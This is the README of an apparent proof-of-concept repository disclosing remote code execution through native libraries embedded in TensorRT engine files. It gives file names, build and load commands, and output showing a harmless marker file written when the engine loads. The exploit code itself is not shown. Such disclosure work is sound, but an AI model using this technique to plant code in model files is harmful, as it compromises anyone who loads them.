File size: 1,478 Bytes
a2de5f4 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 | # TensorRT Engine File RCE PoC
## Vulnerability
Arbitrary code execution via embedded native shared libraries (DLL/SO) in TensorRT engine files (.engine/.trt/.plan). The embedded library's constructor (`DllMain`/`__attribute__((constructor))`) executes automatically when the engine is deserialized with `engine_host_code_allowed=True`.
## Files
| File | Description |
|---|---|
| `malicious_model.engine` | Crafted TensorRT engine with embedded malicious DLL |
| `malicious_plugin.c` | Source code of the malicious plugin |
| `build_poc.py` | Script to build the malicious engine |
| `load_poc.py` | Script to load the engine and trigger RCE |
## Reproduction
### Prerequisites
- NVIDIA GPU with CUDA drivers
- TensorRT 8.6+ (`pip install tensorrt`)
- C compiler (MSVC on Windows, GCC on Linux)
### Steps
```bash
# 1. Build the malicious engine (or use the pre-built malicious_model.engine)
python build_poc.py
# 2. Load the engine — triggers arbitrary code execution
python load_poc.py evidence/malicious_model.engine
# 3. Verify code execution
# Windows: check C:\temp\tensorrt_rce_poc.txt
# Linux: check /tmp/tensorrt_rce_poc
```
### Expected Output
```
[!] TensorRT RCE PoC: Arbitrary code executed via embedded plugin!
[!] Proof written to tensorrt_rce_poc.txt
[!] PID: <process_id>
[!!!] CODE EXECUTION CONFIRMED: C:\temp\tensorrt_rce_poc.txt
```
## Tested Environment
- Windows 10/11, NVIDIA RTX 4080 Super
- CUDA 13.0, TensorRT 10.15.1.29
- Python 3.12
|